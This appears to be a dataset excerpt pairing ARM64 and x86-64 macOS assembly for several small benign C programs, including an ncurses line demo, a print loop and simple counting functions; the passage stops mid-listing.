arm
stringlengths
122
20M
x86
stringlengths
122
20M
filename
stringlengths
18
26
.section __TEXT,__text,regular,pure_instructions .build_version macos, 13, 0 sdk_version 13, 3 .subsections_via_symbols
.section __TEXT,__text,regular,pure_instructions .build_version macos, 13, 0 sdk_version 13, 3 .subsections_via_symbols
the_stack_data/154831992.c
.section __TEXT,__text,regular,pure_instructions .build_version macos, 13, 0 sdk_version 13, 3 .globl _main ; -- Begin function main .p2align 2 _main: ; @main .cfi_startproc ; %bb.0: sub sp, sp, #48 .cfi_def_cfa_offset 48 stp x29, x30, [sp, #32] ; 16-byte Folded Spill add x29, sp, #32 .cfi_def_cfa w29, 16 .cfi_offset w30, -8 .cfi_offset w29, -16 adrp x8, _stdscr@GOTPAGE ldr x8, [x8, _stdscr@GOTPAGEOFF] str x8, [sp, #16] ; 8-byte Folded Spill mov w8, #0 stur w8, [x29, #-8] ; 4-byte Folded Spill stur wzr, [x29, #-4] bl _initscr ldr x8, [sp, #16] ; 8-byte Folded Reload ldr x0, [x8] adrp x1, l_.str@PAGE add x1, x1, l_.str@PAGEOFF mov w2, #-1 str w2, [sp, #12] ; 4-byte Folded Spill bl _waddnstr ldr w2, [sp, #12] ; 4-byte Folded Reload ldr x8, [sp, #16] ; 8-byte Folded Reload ldr x0, [x8] adrp x1, l_.str.1@PAGE add x1, x1, l_.str.1@PAGEOFF bl _waddnstr ldr w2, [sp, #12] ; 4-byte Folded Reload ldr x8, [sp, #16] ; 8-byte Folded Reload ldr x0, [x8] adrp x1, l_.str.2@PAGE add x1, x1, l_.str.2@PAGEOFF bl _waddnstr ldr w2, [sp, #12] ; 4-byte Folded Reload ldr x8, [sp, #16] ; 8-byte Folded Reload ldr x0, [x8] adrp x1, l_.str.3@PAGE add x1, x1, l_.str.3@PAGEOFF bl _waddnstr ldr w2, [sp, #12] ; 4-byte Folded Reload ldr x8, [sp, #16] ; 8-byte Folded Reload ldr x0, [x8] adrp x1, l_.str.4@PAGE add x1, x1, l_.str.4@PAGEOFF bl _waddnstr ldr x8, [sp, #16] ; 8-byte Folded Reload ldr x0, [x8] bl _wrefresh ldr x8, [sp, #16] ; 8-byte Folded Reload ldr x0, [x8] bl _wgetch ldr x8, [sp, #16] ; 8-byte Folded Reload ldur w2, [x29, #-8] ; 4-byte Folded Reload ldr x0, [x8] mov w1, #2 bl _wmove ldr w1, [sp, #12] ; 4-byte Folded Reload ldr x8, [sp, #16] ; 8-byte Folded Reload ldr x0, [x8] bl _winsdelln ldr x8, [sp, #16] ; 8-byte Folded Reload ldr x0, [x8] bl _wrefresh ldr x8, [sp, #16] ; 8-byte Folded Reload ldr x0, [x8] bl _wgetch bl _endwin ldur w0, [x29, #-8] ; 4-byte Folded Reload ldp x29, x30, [sp, #32] ; 16-byte Folded Reload add sp, sp, #48 ret .cfi_endproc ; -- End function .section __TEXT,__cstring,cstring_literals l_.str: ; @.str .asciz "This is the first line\n" l_.str.1: ; @.str.1 .asciz "Line two here\n" l_.str.2: ; @.str.2 .asciz "The third line\n" l_.str.3: ; @.str.3 .asciz "Fourth line here\n" l_.str.4: ; @.str.4 .asciz "And the fifth line\n" .subsections_via_symbols
.section __TEXT,__text,regular,pure_instructions .build_version macos, 13, 0 sdk_version 13, 3 .globl _main ## -- Begin function main .p2align 4, 0x90 _main: ## @main .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp subq $16, %rsp movl $0, -4(%rbp) callq _initscr movq _stdscr@GOTPCREL(%rip), %rax movq (%rax), %rdi leaq L_.str(%rip), %rsi movl $4294967295, %edx ## imm = 0xFFFFFFFF callq _waddnstr movq _stdscr@GOTPCREL(%rip), %rax movq (%rax), %rdi leaq L_.str.1(%rip), %rsi movl $4294967295, %edx ## imm = 0xFFFFFFFF callq _waddnstr movq _stdscr@GOTPCREL(%rip), %rax movq (%rax), %rdi leaq L_.str.2(%rip), %rsi movl $4294967295, %edx ## imm = 0xFFFFFFFF callq _waddnstr movq _stdscr@GOTPCREL(%rip), %rax movq (%rax), %rdi leaq L_.str.3(%rip), %rsi movl $4294967295, %edx ## imm = 0xFFFFFFFF callq _waddnstr movq _stdscr@GOTPCREL(%rip), %rax movq (%rax), %rdi leaq L_.str.4(%rip), %rsi movl $4294967295, %edx ## imm = 0xFFFFFFFF callq _waddnstr movq _stdscr@GOTPCREL(%rip), %rax movq (%rax), %rdi callq _wrefresh movq _stdscr@GOTPCREL(%rip), %rax movq (%rax), %rdi callq _wgetch movq _stdscr@GOTPCREL(%rip), %rax movq (%rax), %rdi movl $2, %esi xorl %edx, %edx callq _wmove movq _stdscr@GOTPCREL(%rip), %rax movq (%rax), %rdi movl $4294967295, %esi ## imm = 0xFFFFFFFF callq _winsdelln movq _stdscr@GOTPCREL(%rip), %rax movq (%rax), %rdi callq _wrefresh movq _stdscr@GOTPCREL(%rip), %rax movq (%rax), %rdi callq _wgetch callq _endwin xorl %eax, %eax addq $16, %rsp popq %rbp retq .cfi_endproc ## -- End function .section __TEXT,__cstring,cstring_literals L_.str: ## @.str .asciz "This is the first line\n" L_.str.1: ## @.str.1 .asciz "Line two here\n" L_.str.2: ## @.str.2 .asciz "The third line\n" L_.str.3: ## @.str.3 .asciz "Fourth line here\n" L_.str.4: ## @.str.4 .asciz "And the fifth line\n" .subsections_via_symbols
the_stack_data/181394538.c
.section __TEXT,__text,regular,pure_instructions .build_version macos, 13, 0 sdk_version 13, 3 .globl _main ; -- Begin function main .p2align 2 _main: ; @main .cfi_startproc ; %bb.0: sub sp, sp, #64 .cfi_def_cfa_offset 64 stp x29, x30, [sp, #48] ; 16-byte Folded Spill add x29, sp, #48 .cfi_def_cfa w29, 16 .cfi_offset w30, -8 .cfi_offset w29, -16 stur wzr, [x29, #-4] mov w8, #13 stur w8, [x29, #-12] mov w8, #21 stur w8, [x29, #-16] mov w8, #9 str w8, [sp, #24] ldur w8, [x29, #-16] ; implicit-def: $x10 mov x10, x8 ldur w9, [x29, #-12] ; implicit-def: $x8 mov x8, x9 mov x9, sp str x10, [x9] str x8, [x9, #8] adrp x0, l_.str@PAGE add x0, x0, l_.str@PAGEOFF bl _printf ldur w8, [x29, #-16] ldur w9, [x29, #-12] subs w8, w8, w9 stur w8, [x29, #-8] b LBB0_1 LBB0_1: ; =>This Inner Loop Header: Depth=1 ldur w8, [x29, #-8] subs w8, w8, #0 cset w8, eq tbnz w8, #0, LBB0_3 b LBB0_2 LBB0_2: ; in Loop: Header=BB0_1 Depth=1 ldur w9, [x29, #-8] ; implicit-def: $x8 mov x8, x9 mov x9, sp str x8, [x9] adrp x0, l_.str.1@PAGE add x0, x0, l_.str.1@PAGEOFF bl _printf ldur w8, [x29, #-12] stur w8, [x29, #-16] ldur w8, [x29, #-8] stur w8, [x29, #-12] ldur w8, [x29, #-16] ldur w9, [x29, #-12] subs w8, w8, w9 stur w8, [x29, #-8] b LBB0_1 LBB0_3: mov x8, sp str xzr, [x8] adrp x0, l_.str.1@PAGE add x0, x0, l_.str.1@PAGEOFF bl _printf mov w0, #0 ldp x29, x30, [sp, #48] ; 16-byte Folded Reload add sp, sp, #64 ret .cfi_endproc ; -- End function .section __TEXT,__cstring,cstring_literals l_.str: ; @.str .asciz "%d,%d," l_.str.1: ; @.str.1 .asciz "%d," .subsections_via_symbols
.section __TEXT,__text,regular,pure_instructions .build_version macos, 13, 0 sdk_version 13, 3 .globl _main ## -- Begin function main .p2align 4, 0x90 _main: ## @main .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp subq $32, %rsp movl $0, -4(%rbp) movl $13, -12(%rbp) movl $21, -16(%rbp) movl $9, -24(%rbp) movl -16(%rbp), %esi movl -12(%rbp), %edx leaq L_.str(%rip), %rdi movb $0, %al callq _printf movl -16(%rbp), %eax subl -12(%rbp), %eax movl %eax, -8(%rbp) LBB0_1: ## =>This Inner Loop Header: Depth=1 cmpl $0, -8(%rbp) je LBB0_3 ## %bb.2: ## in Loop: Header=BB0_1 Depth=1 movl -8(%rbp), %esi leaq L_.str.1(%rip), %rdi movb $0, %al callq _printf movl -12(%rbp), %eax movl %eax, -16(%rbp) movl -8(%rbp), %eax movl %eax, -12(%rbp) movl -16(%rbp), %eax subl -12(%rbp), %eax movl %eax, -8(%rbp) jmp LBB0_1 LBB0_3: leaq L_.str.1(%rip), %rdi xorl %esi, %esi movb $0, %al callq _printf xorl %eax, %eax addq $32, %rsp popq %rbp retq .cfi_endproc ## -- End function .section __TEXT,__cstring,cstring_literals L_.str: ## @.str .asciz "%d,%d," L_.str.1: ## @.str.1 .asciz "%d," .subsections_via_symbols
the_stack_data/45451054.c
.section __TEXT,__text,regular,pure_instructions .build_version macos, 13, 0 sdk_version 13, 3 .globl _main ; -- Begin function main .p2align 2 _main: ; @main .cfi_startproc ; %bb.0: sub sp, sp, #16 .cfi_def_cfa_offset 16 mov w0, #0 str wzr, [sp, #12] adrp x8, l___const.main.p@PAGE ldrh w8, [x8, l___const.main.p@PAGEOFF] strh w8, [sp, #10] ldrb w8, [sp, #10] and w8, w8, #0xffffff9f orr w8, w8, #0x60 strb w8, [sp, #10] add sp, sp, #16 ret .cfi_endproc ; -- End function .section __TEXT,__const .p2align 1 ; @__const.main.p l___const.main.p: .byte 83 ; 0x53 .byte 11 ; 0xb .subsections_via_symbols
.section __TEXT,__text,regular,pure_instructions .build_version macos, 13, 0 sdk_version 13, 3 .globl _main ## -- Begin function main .p2align 4, 0x90 _main: ## @main .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp movl $0, -4(%rbp) movw l___const.main.p(%rip), %ax movw %ax, -8(%rbp) movb -8(%rbp), %al andb $-97, %al orb $96, %al movb %al, -8(%rbp) xorl %eax, %eax popq %rbp retq .cfi_endproc ## -- End function .section __TEXT,__const .p2align 1 ## @__const.main.p l___const.main.p: .byte 83 ## 0x53 .byte 11 ## 0xb .subsections_via_symbols
the_stack_data/200143367.c
.section __TEXT,__text,regular,pure_instructions .build_version macos, 13, 0 sdk_version 13, 3 .globl _main ; -- Begin function main .p2align 2 _main: ; @main .cfi_startproc ; %bb.0: sub sp, sp, #48 .cfi_def_cfa_offset 48 stp x29, x30, [sp, #32] ; 16-byte Folded Spill add x29, sp, #32 .cfi_def_cfa w29, 16 .cfi_offset w30, -8 .cfi_offset w29, -16 mov w8, #0 stur w8, [x29, #-12] ; 4-byte Folded Spill stur wzr, [x29, #-4] mov w8, #23212 movk w8, #15677, lsl #16 fmov s0, w8 stur s0, [x29, #-8] ldur s0, [x29, #-8] fcvt d0, s0 mov x8, sp str d0, [x8] adrp x0, l_.str@PAGE add x0, x0, l_.str@PAGEOFF bl _printf ldur w0, [x29, #-12] ; 4-byte Folded Reload ldp x29, x30, [sp, #32] ; 16-byte Folded Reload add sp, sp, #48 ret .cfi_endproc ; -- End function .section __TEXT,__cstring,cstring_literals l_.str: ; @.str .asciz "result = %e" .subsections_via_symbols
.section __TEXT,__text,regular,pure_instructions .build_version macos, 13, 0 sdk_version 13, 3 .section __TEXT,__literal4,4byte_literals .p2align 2 ## -- Begin function main LCPI0_0: .long 0x3d3d5aac ## float 0.0462290496 .section __TEXT,__text,regular,pure_instructions .globl _main .p2align 4, 0x90 _main: ## @main .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp subq $16, %rsp movl $0, -4(%rbp) movss LCPI0_0(%rip), %xmm0 ## xmm0 = mem[0],zero,zero,zero movss %xmm0, -8(%rbp) movss -8(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero cvtss2sd %xmm0, %xmm0 leaq L_.str(%rip), %rdi movb $1, %al callq _printf xorl %eax, %eax addq $16, %rsp popq %rbp retq .cfi_endproc ## -- End function .section __TEXT,__cstring,cstring_literals L_.str: ## @.str .asciz "result = %e" .subsections_via_symbols
the_stack_data/1122633.c
.section __TEXT,__text,regular,pure_instructions .build_version macos, 13, 0 sdk_version 13, 3 .globl _gang ; -- Begin function gang .p2align 2 _gang: ; @gang .cfi_startproc ; %bb.0: sub sp, sp, #16 .cfi_def_cfa_offset 16 str wzr, [sp, #12] b LBB0_1 LBB0_1: ; =>This Inner Loop Header: Depth=1 ldr w8, [sp, #12] subs w8, w8, #10 cset w8, ge tbnz w8, #0, LBB0_4 b LBB0_2 LBB0_2: ; in Loop: Header=BB0_1 Depth=1 b LBB0_3 LBB0_3: ; in Loop: Header=BB0_1 Depth=1 ldr w8, [sp, #12] add w8, w8, #1 str w8, [sp, #12] b LBB0_1 LBB0_4: mov w0, #1 add sp, sp, #16 ret .cfi_endproc ; -- End function .globl _worker ; -- Begin function worker .p2align 2 _worker: ; @worker .cfi_startproc ; %bb.0: sub sp, sp, #16 .cfi_def_cfa_offset 16 str wzr, [sp, #12] b LBB1_1 LBB1_1: ; =>This Inner Loop Header: Depth=1 ldr w8, [sp, #12] subs w8, w8, #10 cset w8, ge tbnz w8, #0, LBB1_4 b LBB1_2 LBB1_2: ; in Loop: Header=BB1_1 Depth=1 b LBB1_3 LBB1_3: ; in Loop: Header=BB1_1 Depth=1 ldr w8, [sp, #12] add w8, w8, #1 str w8, [sp, #12] b LBB1_1 LBB1_4: mov w0, #1 add sp, sp, #16 ret .cfi_endproc ; -- End function .globl _vector ; -- Begin function vector .p2align 2 _vector: ; @vector .cfi_startproc ; %bb.0: sub sp, sp, #16 .cfi_def_cfa_offset 16 str wzr, [sp, #12] b LBB2_1 LBB2_1: ; =>This Inner Loop Header: Depth=1 ldr w8, [sp, #12] subs w8, w8, #10 cset w8, ge tbnz w8, #0, LBB2_4 b LBB2_2 LBB2_2: ; in Loop: Header=BB2_1 Depth=1 b LBB2_3 LBB2_3: ; in Loop: Header=BB2_1 Depth=1 ldr w8, [sp, #12] add w8, w8, #1 str w8, [sp, #12] b LBB2_1 LBB2_4: mov w0, #1 add sp, sp, #16 ret .cfi_endproc ; -- End function .globl _seq ; -- Begin function seq .p2align 2 _seq: ; @seq .cfi_startproc ; %bb.0: mov w0, #1 ret .cfi_endproc ; -- End function .globl _main ; -- Begin function main .p2align 2 _main: ; @main .cfi_startproc ; %bb.0: sub sp, sp, #96 .cfi_def_cfa_offset 96 stp x29, x30, [sp, #80] ; 16-byte Folded Spill add x29, sp, #80 .cfi_def_cfa w29, 16 .cfi_offset w30, -8 .cfi_offset w29, -16 stur wzr, [x29, #-4] stur wzr, [x29, #-8] stur wzr, [x29, #-12] b LBB4_1 LBB4_1: ; =>This Inner Loop Header: Depth=1 ldur w8, [x29, #-12] subs w8, w8, #10 cset w8, ge tbnz w8, #0, LBB4_4 b LBB4_2 LBB4_2: ; in Loop: Header=BB4_1 Depth=1 bl _gang ldur w8, [x29, #-8] add w8, w8, w0 stur w8, [x29, #-8] b LBB4_3 LBB4_3: ; in Loop: Header=BB4_1 Depth=1 ldur w8, [x29, #-12] add w8, w8, #1 stur w8, [x29, #-12] b LBB4_1 LBB4_4: stur wzr, [x29, #-16] b LBB4_5 LBB4_5: ; =>This Inner Loop Header: Depth=1 ldur w8, [x29, #-16] subs w8, w8, #10 cset w8, ge tbnz w8, #0, LBB4_8 b LBB4_6 LBB4_6: ; in Loop: Header=BB4_5 Depth=1 bl _worker ldur w8, [x29, #-8] add w8, w8, w0 stur w8, [x29, #-8] b LBB4_7 LBB4_7: ; in Loop: Header=BB4_5 Depth=1 ldur w8, [x29, #-16] add w8, w8, #1 stur w8, [x29, #-16] b LBB4_5 LBB4_8: stur wzr, [x29, #-20] b LBB4_9 LBB4_9: ; =>This Inner Loop Header: Depth=1 ldur w8, [x29, #-20] subs w8, w8, #10 cset w8, ge tbnz w8, #0, LBB4_12 b LBB4_10 LBB4_10: ; in Loop: Header=BB4_9 Depth=1 bl _vector ldur w8, [x29, #-8] add w8, w8, w0 stur w8, [x29, #-8] b LBB4_11 LBB4_11: ; in Loop: Header=BB4_9 Depth=1 ldur w8, [x29, #-20] add w8, w8, #1 stur w8, [x29, #-20] b LBB4_9 LBB4_12: stur wzr, [x29, #-24] b LBB4_13 LBB4_13: ; =>This Inner Loop Header: Depth=1 ldur w8, [x29, #-24] subs w8, w8, #10 cset w8, ge tbnz w8, #0, LBB4_16 b LBB4_14 LBB4_14: ; in Loop: Header=BB4_13 Depth=1 bl _gang ldur w8, [x29, #-8] add w8, w8, w0 stur w8, [x29, #-8] b LBB4_15 LBB4_15: ; in Loop: Header=BB4_13 Depth=1 ldur w8, [x29, #-24] add w8, w8, #1 stur w8, [x29, #-24] b LBB4_13 LBB4_16: stur wzr, [x29, #-28] b LBB4_17 LBB4_17: ; =>This Inner Loop Header: Depth=1 ldur w8, [x29, #-28] subs w8, w8, #10 cset w8, ge tbnz w8, #0, LBB4_20 b LBB4_18 LBB4_18: ; in Loop: Header=BB4_17 Depth=1 bl _gang ldur w8, [x29, #-8] add w8, w8, w0 stur w8, [x29, #-8] b LBB4_19 LBB4_19: ; in Loop: Header=BB4_17 Depth=1 ldur w8, [x29, #-28] add w8, w8, #1 stur w8, [x29, #-28] b LBB4_17 LBB4_20: stur wzr, [x29, #-32] b LBB4_21 LBB4_21: ; =>This Inner Loop Header: Depth=1 ldur w8, [x29, #-32] subs w8, w8, #10 cset w8, ge tbnz w8, #0, LBB4_24 b LBB4_22 LBB4_22: ; in Loop: Header=BB4_21 Depth=1 bl _gang ldur w8, [x29, #-8] add w8, w8, w0 stur w8, [x29, #-8] b LBB4_23 LBB4_23: ; in Loop: Header=BB4_21 Depth=1 ldur w8, [x29, #-32] add w8, w8, #1 stur w8, [x29, #-32] b LBB4_21 LBB4_24: stur wzr, [x29, #-36] b LBB4_25 LBB4_25: ; =>This Inner Loop Header: Depth=1 ldur w8, [x29, #-36] subs w8, w8, #10 cset w8, ge tbnz w8, #0, LBB4_28 b LBB4_26 LBB4_26: ; in Loop: Header=BB4_25 Depth=1 bl _worker ldur w8, [x29, #-8] add w8, w8, w0 stur w8, [x29, #-8] b LBB4_27 LBB4_27: ; in Loop: Header=BB4_25 Depth=1 ldur w8, [x29, #-36] add w8, w8, #1 stur w8, [x29, #-36] b LBB4_25 LBB4_28: str wzr, [sp, #40] b LBB4_29 LBB4_29: ; =>This Inner Loop Header: Depth=1 ldr w8, [sp, #40] subs w8, w8, #10 cset w8, ge tbnz w8, #0, LBB4_32 b LBB4_30 LBB4_30: ; in Loop: Header=BB4_29 Depth=1 bl _worker ldur w8, [x29, #-8] add w8, w8, w0 stur w8, [x29, #-8] b LBB4_31 LBB4_31: ; in Loop: Header=BB4_29 Depth=1 ldr w8, [sp, #40] add w8, w8, #1 str w8, [sp, #40] b LBB4_29 LBB4_32: str wzr, [sp, #36] b LBB4_33 LBB4_33: ; =>This Inner Loop Header: Depth=1 ldr w8, [sp, #36] subs w8, w8, #10 cset w8, ge tbnz w8, #0, LBB4_36 b LBB4_34 LBB4_34: ; in Loop: Header=BB4_33 Depth=1 bl _worker ldur w8, [x29, #-8] add w8, w8, w0 stur w8, [x29, #-8] b LBB4_35 LBB4_35: ; in Loop: Header=BB4_33 Depth=1 ldr w8, [sp, #36] add w8, w8, #1 str w8, [sp, #36] b LBB4_33 LBB4_36: str wzr, [sp, #32] b LBB4_37 LBB4_37: ; =>This Inner Loop Header: Depth=1 ldr w8, [sp, #32] subs w8, w8, #10 cset w8, ge tbnz w8, #0, LBB4_40 b LBB4_38 LBB4_38: ; in Loop: Header=BB4_37 Depth=1 bl _vector ldur w8, [x29, #-8] add w8, w8, w0 stur w8, [x29, #-8] b LBB4_39 LBB4_39: ; in Loop: Header=BB4_37 Depth=1 ldr w8, [sp, #32] add w8, w8, #1 str w8, [sp, #32] b LBB4_37 LBB4_40: str wzr, [sp, #28] b LBB4_41 LBB4_41: ; =>This Inner Loop Header: Depth=1 ldr w8, [sp, #28] subs w8, w8, #10 cset w8, ge tbnz w8, #0, LBB4_44 b LBB4_42 LBB4_42: ; in Loop: Header=BB4_41 Depth=1 bl _vector ldur w8, [x29, #-8] add w8, w8, w0 stur w8, [x29, #-8] b LBB4_43 LBB4_43: ; in Loop: Header=BB4_41 Depth=1 ldr w8, [sp, #28] add w8, w8, #1 str w8, [sp, #28] b LBB4_41 LBB4_44: str wzr, [sp, #24] b LBB4_45 LBB4_45: ; =>This Inner Loop Header: Depth=1 ldr w8, [sp, #24] subs w8, w8, #10 cset w8, ge tbnz w8, #0, LBB4_48 b LBB4_46 LBB4_46: ; in Loop: Header=BB4_45 Depth=1 bl _vector ldur w8, [x29, #-8] add w8, w8, w0 stur w8, [x29, #-8] b LBB4_47 LBB4_47: ; in Loop: Header=BB4_45 Depth=1 ldr w8, [sp, #24] add w8, w8, #1 str w8, [sp, #24] b LBB4_45 LBB4_48: str wzr, [sp, #20] b LBB4_49 LBB4_49: ; =>This Inner Loop Header: Depth=1 ldr w8, [sp, #20] subs w8, w8, #10 cset w8, ge tbnz w8, #0, LBB4_52 b LBB4_50 LBB4_50: ; in Loop: Header=BB4_49 Depth=1 bl _seq ldur w8, [x29, #-8] add w8, w8, w0 stur w8, [x29, #-8] b LBB4_51 LBB4_51: ; in Loop: Header=BB4_49 Depth=1 ldr w8, [sp, #20] add w8, w8, #1 str w8, [sp, #20] b LBB4_49 LBB4_52: str wzr, [sp, #16] b LBB4_53 LBB4_53: ; =>This Inner Loop Header: Depth=1 ldr w8, [sp, #16] subs w8, w8, #10 cset w8, ge tbnz w8, #0, LBB4_56 b LBB4_54 LBB4_54: ; in Loop: Header=BB4_53 Depth=1 bl _seq ldur w8, [x29, #-8] add w8, w8, w0 stur w8, [x29, #-8] b LBB4_55 LBB4_55: ; in Loop: Header=BB4_53 Depth=1 ldr w8, [sp, #16] add w8, w8, #1 str w8, [sp, #16] b LBB4_53 LBB4_56: str wzr, [sp, #12] b LBB4_57 LBB4_57: ; =>This Inner Loop Header: Depth=1 ldr w8, [sp, #12] subs w8, w8, #10 cset w8, ge tbnz w8, #0, LBB4_60 b LBB4_58 LBB4_58: ; in Loop: Header=BB4_57 Depth=1 bl _seq ldur w8, [x29, #-8] add w8, w8, w0 stur w8, [x29, #-8] b LBB4_59 LBB4_59: ; in Loop: Header=BB4_57 Depth=1 ldr w8, [sp, #12] add w8, w8, #1 str w8, [sp, #12] b LBB4_57 LBB4_60: mov w0, #0 ldp x29, x30, [sp, #80] ; 16-byte Folded Reload add sp, sp, #96 ret .cfi_endproc ; -- End function .subsections_via_symbols
.section __TEXT,__text,regular,pure_instructions .build_version macos, 13, 0 sdk_version 13, 3 .globl _gang ## -- Begin function gang .p2align 4, 0x90 _gang: ## @gang .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp movl $0, -4(%rbp) LBB0_1: ## =>This Inner Loop Header: Depth=1 cmpl $10, -4(%rbp) jge LBB0_4 ## %bb.2: ## in Loop: Header=BB0_1 Depth=1 jmp LBB0_3 LBB0_3: ## in Loop: Header=BB0_1 Depth=1 movl -4(%rbp), %eax addl $1, %eax movl %eax, -4(%rbp) jmp LBB0_1 LBB0_4: movl $1, %eax popq %rbp retq .cfi_endproc ## -- End function .globl _worker ## -- Begin function worker .p2align 4, 0x90 _worker: ## @worker .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp movl $0, -4(%rbp) LBB1_1: ## =>This Inner Loop Header: Depth=1 cmpl $10, -4(%rbp) jge LBB1_4 ## %bb.2: ## in Loop: Header=BB1_1 Depth=1 jmp LBB1_3 LBB1_3: ## in Loop: Header=BB1_1 Depth=1 movl -4(%rbp), %eax addl $1, %eax movl %eax, -4(%rbp) jmp LBB1_1 LBB1_4: movl $1, %eax popq %rbp retq .cfi_endproc ## -- End function .globl _vector ## -- Begin function vector .p2align 4, 0x90 _vector: ## @vector .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp movl $0, -4(%rbp) LBB2_1: ## =>This Inner Loop Header: Depth=1 cmpl $10, -4(%rbp) jge LBB2_4 ## %bb.2: ## in Loop: Header=BB2_1 Depth=1 jmp LBB2_3 LBB2_3: ## in Loop: Header=BB2_1 Depth=1 movl -4(%rbp), %eax addl $1, %eax movl %eax, -4(%rbp) jmp LBB2_1 LBB2_4: movl $1, %eax popq %rbp retq .cfi_endproc ## -- End function .globl _seq ## -- Begin function seq .p2align 4, 0x90 _seq: ## @seq .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp movl $1, %eax popq %rbp retq .cfi_endproc ## -- End function .globl _main ## -- Begin function main .p2align 4, 0x90 _main: ## @main .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp subq $80, %rsp movl $0, -4(%rbp) movl $0, -8(%rbp) movl $0, -12(%rbp) LBB4_1: ## =>This Inner Loop Header: Depth=1 cmpl $10, -12(%rbp) jge LBB4_4 ## %bb.2: ## in Loop: Header=BB4_1 Depth=1 callq _gang addl -8(%rbp), %eax movl %eax, -8(%rbp) ## %bb.3: ## in Loop: Header=BB4_1 Depth=1 movl -12(%rbp), %eax addl $1, %eax movl %eax, -12(%rbp) jmp LBB4_1 LBB4_4: movl $0, -16(%rbp) LBB4_5: ## =>This Inner Loop Header: Depth=1 cmpl $10, -16(%rbp) jge LBB4_8 ## %bb.6: ## in Loop: Header=BB4_5 Depth=1 callq _worker addl -8(%rbp), %eax movl %eax, -8(%rbp) ## %bb.7: ## in Loop: Header=BB4_5 Depth=1 movl -16(%rbp), %eax addl $1, %eax movl %eax, -16(%rbp) jmp LBB4_5 LBB4_8: movl $0, -20(%rbp) LBB4_9: ## =>This Inner Loop Header: Depth=1 cmpl $10, -20(%rbp) jge LBB4_12 ## %bb.10: ## in Loop: Header=BB4_9 Depth=1 callq _vector addl -8(%rbp), %eax movl %eax, -8(%rbp) ## %bb.11: ## in Loop: Header=BB4_9 Depth=1 movl -20(%rbp), %eax addl $1, %eax movl %eax, -20(%rbp) jmp LBB4_9 LBB4_12: movl $0, -24(%rbp) LBB4_13: ## =>This Inner Loop Header: Depth=1 cmpl $10, -24(%rbp) jge LBB4_16 ## %bb.14: ## in Loop: Header=BB4_13 Depth=1 callq _gang addl -8(%rbp), %eax movl %eax, -8(%rbp) ## %bb.15: ## in Loop: Header=BB4_13 Depth=1 movl -24(%rbp), %eax addl $1, %eax movl %eax, -24(%rbp) jmp LBB4_13 LBB4_16: movl $0, -28(%rbp) LBB4_17: ## =>This Inner Loop Header: Depth=1 cmpl $10, -28(%rbp) jge LBB4_20 ## %bb.18: ## in Loop: Header=BB4_17 Depth=1 callq _gang addl -8(%rbp), %eax movl %eax, -8(%rbp) ## %bb.19: ## in Loop: Header=BB4_17 Depth=1 movl -28(%rbp), %eax addl $1, %eax movl %eax, -28(%rbp) jmp LBB4_17 LBB4_20: movl $0, -32(%rbp) LBB4_21: ## =>This Inner Loop Header: Depth=1 cmpl $10, -32(%rbp) jge LBB4_24 ## %bb.22: ## in Loop: Header=BB4_21 Depth=1 callq _gang addl -8(%rbp), %eax movl %eax, -8(%rbp) ## %bb.23: ## in Loop: Header=BB4_21 Depth=1 movl -32(%rbp), %eax addl $1, %eax movl %eax, -32(%rbp) jmp LBB4_21 LBB4_24: movl $0, -36(%rbp) LBB4_25: ## =>This Inner Loop Header: Depth=1 cmpl $10, -36(%rbp) jge LBB4_28 ## %bb.26: ## in Loop: Header=BB4_25 Depth=1 callq _worker addl -8(%rbp), %eax movl %eax, -8(%rbp) ## %bb.27: ## in Loop: Header=BB4_25 Depth=1 movl -36(%rbp), %eax addl $1, %eax movl %eax, -36(%rbp) jmp LBB4_25 LBB4_28: movl $0, -40(%rbp) LBB4_29: ## =>This Inner Loop Header: Depth=1 cmpl $10, -40(%rbp) jge LBB4_32 ## %bb.30: ## in Loop: Header=BB4_29 Depth=1 callq _worker addl -8(%rbp), %eax movl %eax, -8(%rbp) ## %bb.31: ## in Loop: Header=BB4_29 Depth=1 movl -40(%rbp), %eax addl $1, %eax movl %eax, -40(%rbp) jmp LBB4_29 LBB4_32: movl $0, -44(%rbp) LBB4_33: ## =>This Inner Loop Header: Depth=1 cmpl $10, -44(%rbp) jge LBB4_36 ## %bb.34: ## in Loop: Header=BB4_33 Depth=1 callq _worker addl -8(%rbp), %eax movl %eax, -8(%rbp) ## %bb.35: ## in Loop: Header=BB4_33 Depth=1 movl -44(%rbp), %eax addl $1, %eax movl %eax, -44(%rbp) jmp LBB4_33 LBB4_36: movl $0, -48(%rbp) LBB4_37: ## =>This Inner Loop Header: Depth=1 cmpl $10, -48(%rbp) jge LBB4_40 ## %bb.38: ## in Loop: Header=BB4_37 Depth=1 callq _vector addl -8(%rbp), %eax movl %eax, -8(%rbp) ## %bb.39: ## in Loop: Header=BB4_37 Depth=1 movl -48(%rbp), %eax addl $1, %eax movl %eax, -48(%rbp) jmp LBB4_37 LBB4_40: movl $0, -52(%rbp) LBB4_41: ## =>This Inner Loop Header: Depth=1 cmpl $10, -52(%rbp) jge LBB4_44 ## %bb.42: ## in Loop: Header=BB4_41 Depth=1 callq _vector addl -8(%rbp), %eax movl %eax, -8(%rbp) ## %bb.43: ## in Loop: Header=BB4_41 